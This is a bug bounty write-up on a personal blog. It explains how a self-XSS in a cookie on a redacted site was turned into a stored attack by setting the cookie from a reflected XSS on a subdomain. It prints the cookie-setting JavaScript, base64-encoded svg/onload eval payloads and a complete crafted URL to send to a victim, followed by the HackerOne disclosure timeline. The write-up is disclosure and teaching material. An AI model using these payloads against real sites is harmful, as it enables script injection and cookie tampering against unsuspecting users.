ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • From Unexploited XSS To Self Stored XSS on victim Cookies
    BugBounty 2021. 3. 22. 06:01

    Day #1

    This is part 2 of this story  , i will talk about a self XSS on Cookies And how i did the exploit through an out of scope subdomain.So our target is redact.com. first how i got the vulnerable attribute on cookies based? After browsing the redact.com i stopped in this path www.redacted.com/redactedfolder/redactedpage/ID and i used param miner {bruteForce] for hidden parameters , i got TWO but Unfortunately all are Filtered, then turned to guess Cookie parameters

     

     

     

    finally i got an attribute named visitor_id and was injected on the js source code

     

    Now i have A self XSS and it's out of scope. but subdomains allows you to set cookie so i will exploit through an out-of scope subdomain.

    Day#2

    i extracted subdomains, after 1h/2h i got an reflected xss on a sub named http://dev-labs.redact.com/login?username=[Here], So we will set cookie from subdomain to the main domain, [ Hope you understand the exploitation if \ not , please watch the video

    https://www.youtube.com/watch?v=ntWOiuKe5ts&feature=youtu.be&ab_channel=DawidCzagan]

     

    So our exploit:

     

    document.cookie='visitor_id=w0; domain=.redact.com; path=/;' ;document.location=" https://www.redact.com/redactfolder/redactpage/1337 "

     

    let's Encode it:

     

    </Script><svg/onload=eval(atob('ZG9jdW1lbnQuY29va2llPSd2aXNpdG9yX2lkPXcwPC9zY3JpcHQ+PHN2Zy9vbmxv
    YWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0LmNvbTsgcGF0aD0vOycgO2RvY3VtZW50Lmxv
    Y2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9yZWRhY3RwYWdlLzEzMzci'))>

     

    So Now we have A valid Poc will all sent the url to victime:

     

    http://dev-labs.redact.com/login?username=</script><svg/onload=eval(atob('+ZG9jdW1lbnQuY29va2llPSd
    2aXNpdG9yX2lkPXcwPC9zY3JpcHQPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT47IGRvbWFpbj0ucmVkYWN0L
    mNvbTsgcGF0aD0vOycgO2RvY3VtZW50LmxvY2F0aW9uPSJodHRwczovL3d3dy5yZWRhY3QuY29tL3JlZGFjdGZvbGRlci9y
    ZWRhY3RwYWdlLzEzMzci'))>

     

    will automatically redirect us with the visitor_id attribute and payload to main domain because we have add it via document.location. it's work :D

    Timeline

    Jan 02 - Reported Via Hackerone

    Jan 04 - Hackerone Staff updated the severity from High to Medium(6.1)

    Jan 07- Report Triaged And Bounty paid by Program staff

     

    That's all, thankyou very much for reading it till the last. Hope you would have enjoyed it.

     

     

    Thanks to @elmrhaseel @ayoubakup @Moroccan-Bugbounty-Hunters

    TAG

    댓글 0

Designed by Tistory.